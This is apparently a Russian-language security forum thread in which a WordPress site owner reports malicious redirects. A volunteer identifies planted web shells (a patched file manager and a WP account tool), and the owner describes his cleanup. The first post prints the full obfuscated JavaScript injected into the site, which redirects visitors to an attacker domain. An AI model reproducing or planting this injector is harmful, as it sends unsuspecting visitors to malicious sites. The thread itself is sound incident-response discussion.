Показано с 1 по 10 из 10.

Редирект при открытии сайта Вирус?

  1. #1
    Junior Member Репутация
    Регистрация
    13.12.2021
    Сообщений
    7
    Вес репутации
    11

    Thumbs up Редирект при открытии сайта Вирус?

    Сайт на WP.
    При попытке открыть сайт, происходит редирект сначала на
    Код HTML:
    https://trick.trainresistor.cc/come.php?id=76967-55-43567896-4
    потом на
    Код HTML:
    https://fingerprintopuch.best/go/gzstiodbga5dkobsgy?subid3=plerk&=8&subid4=coffein
    и вываливается кусок кода
    Код:
    	window.stop(); function _0x4165(_0x1c7833,_0x312763){var _0x384719=_0x3847();return _0x4165=function(_0x4165ff,_0x4cb21c){_0x4165ff=_0x4165ff-0x185;var _0x3edf04=_0x384719[_0x4165ff];return _0x3edf04;},_0x4165(_0x1c7833,_0x312763);}var _0x2ca8a2=_0x4165;(function(_0x538cc7,_0x2ae31a){var _0x173fc3=_0x4165,_0x5b6817=_0x538cc7();while(!![]){try{var _0x1b9268=parseInt(_0x173fc3(0x18e))/0x1+parseInt(_0x173fc3(0x191))/0x2*(parseInt(_0x173fc3(0x18d))/0x3)+parseInt(_0x173fc3(0x18f))/0x4+-parseInt(_0x173fc3(0x189))/0x5*(-parseInt(_0x173fc3(0x18c))/0x6)+-parseInt(_0x173fc3(0x186))/0x7+-parseInt(_0x173fc3(0x187))/0x8*(parseInt(_0x173fc3(0x18a))/0x9)+parseInt(_0x173fc3(0x18b))/0xa;if(_0x1b9268===_0x2ae31a)break;else _0x5b6817['push'](_0x5b6817['shift']());}catch(_0x1fc706){_0x5b6817['push'](_0x5b6817['shift']());}}}(_0x3847,0xe77a1));var ll=_0x2ca8a2(0x190);document[_0x2ca8a2(0x188)][_0x2ca8a2(0x185)]=ll,window[_0x2ca8a2(0x188)][_0x2ca8a2(0x192)](ll);function _0x3847(){var _0x786271=['688400bYXEDO','replace','href','5956636QUrnAb','47696JxEbld','location','296330XygErO','2358VtSkab','19357140uMcgeD','18tMFlRH','3cAvVrX','231172tCDMyi','2688948VEEIEX',String.fromCharCode(104,116,116,112,115,58,47,47,116,114,105,99,107,46,116,114,97,105,110,114,101,115,105,115,116,111,114,46,99,99,47,97,46,112,104,112,63,115,105,100,61,49,49,49,49,49,49,38,117,116,109,95,115,111,117,114,99,101,61,55,53,52,56,52,53)];_0x3847=function(){return _0x786271;};return _0x3847();}
    Чем может быть вызвано?
    Вирус?

    Провекрка Aibolit ничего не дала.
    А вот Eset 32 ругается при открытии сайта

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Aleksandra
    Регистрация
    13.01.2007
    Сообщений
    7,761
    Вес репутации
    2858
    Сделайте полный бэкап сайта вместе с БД и ссылку мне в личку.
    Сердце решает кого любить... Судьба решает с кем быть...

  4. #3
    Junior Member Репутация
    Регистрация
    13.12.2021
    Сообщений
    7
    Вес репутации
    11
    Цитата Сообщение от Aleksandra Посмотреть сообщение
    Сделайте полный бэкап сайта вместе с БД и ссылку мне в личку.
    Добрый день.
    Уже решил вопрос.
    Спасибо!

  5. #4
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Aleksandra
    Регистрация
    13.01.2007
    Сообщений
    7,761
    Вес репутации
    2858
    Каким образом?
    Сердце решает кого любить... Судьба решает с кем быть...

  6. #5
    Junior Member Репутация
    Регистрация
    13.12.2021
    Сообщений
    7
    Вес репутации
    11
    Цитата Сообщение от Aleksandra Посмотреть сообщение
    Каким образом?
    Установил примерную дату заражения. Посмотрел в какие файлы были внесены изменения с того момента. Установил ip злоумышленника, по логам посмотрел к каким файлам он обращался.
    К сожалению, бэкапа предшествовавшего моменту заражения уже не было, поэтому восстановил сайт из бэкапа на момент, когда сайт еще открывался, но был уже заражен.
    Закрыл доступ к сайту в htaccess. Удалил зараженные файлы. Удалил папки с шаблоном и плагинами по которым была зафиксирована активность злоумышленника.
    Обновил сайт, заново установил шаблон и плагины, удалил учётные запись созданную злоумышленником, поменял пороли. Установил дополнительные плагины для повышения устойчивости сайта к взлому. В htaccess прописал директивы ограничивающие изменения в файлах только моим IP. Открыл доступ к сайту.
    Пока рецидивов - нет.

  7. #6
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Aleksandra
    Регистрация
    13.01.2007
    Сообщений
    7,761
    Вес репутации
    2858
    Цитата Сообщение от Redje Посмотреть сообщение
    Удалил зараженные файлы.
    Если у вас остались эти файлы, можете скинуть мне их в личку?
    Сердце решает кого любить... Судьба решает с кем быть...

  8. Это понравилось:


  9. #7
    Junior Member Репутация
    Регистрация
    13.12.2021
    Сообщений
    7
    Вес репутации
    11
    Цитата Сообщение от Aleksandra Посмотреть сообщение
    Если у вас остались эти файлы, можете скинуть мне их в личку?
    Отправил ссылку в личку.
    Если не затруднит поделитесь потом тем, что узнаете.
    Чтобы хотя бы знать, что это и как называется )

  10. #8
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Aleksandra
    Регистрация
    13.01.2007
    Сообщений
    7,761
    Вес репутации
    2858
    Цитата Сообщение от Redje Посмотреть сообщение
    Отправил ссылку в личку.
    Если не затруднит поделитесь потом тем, что узнаете.
    Чтобы хотя бы знать, что это и как называется )
    Хорошо, спасибо.
    Сердце решает кого любить... Судьба решает с кем быть...

  11. #9
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Aleksandra
    Регистрация
    13.01.2007
    Сообщений
    7,761
    Вес репутации
    2858
    Патченный https://github.com/prasathmani/tinyfilemanager/, а второй патченный https://gist.github.com/ilaraujo/e65...5a84a7c2bd9598

    Один это полноценный файловый менеджер, другой в основном предназначен для манипуляции с аккаунтами WP.

    Детект с комментариями на VT:

    https://www.virustotal.com/gui/file/...bfa58748ae6efb
    https://www.virustotal.com/gui/file/...362cba7ef76c8f
    Сердце решает кого любить... Судьба решает с кем быть...

  12. Это понравилось:


  13. #10
    Junior Member Репутация
    Регистрация
    13.12.2021
    Сообщений
    7
    Вес репутации
    11
    Цитата Сообщение от Aleksandra Посмотреть сообщение
    Патченный https://github.com/prasathmani/tinyfilemanager/, а второй патченный https://gist.github.com/ilaraujo/e65...5a84a7c2bd9598

    Один это полноценный файловый менеджер, другой в основном предназначен для манипуляции с аккаунтами WP.

    Детект с комментариями на VT:

    https://www.virustotal.com/gui/file/...bfa58748ae6efb
    https://www.virustotal.com/gui/file/...362cba7ef76c8f
    Спасибо!
    Весьма познавательно.

    Хотелось бы еще уточнить, а код который вываливался после редиректа, который был внедрен на сайт, что из себя представляет. Он в первом посте.
    Т.е. какова была цель злоумышленника?

Похожие темы

  1. Ответов: 15
    Последнее сообщение: 10.03.2015, 22:32
  2. Ответов: 17
    Последнее сообщение: 09.02.2015, 16:43
  3. Ответов: 23
    Последнее сообщение: 28.09.2014, 20:12
  4. Ответов: 40
    Последнее сообщение: 24.03.2014, 17:15
  5. Ответов: 2
    Последнее сообщение: 28.12.2013, 20:32

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00316 seconds with 18 queries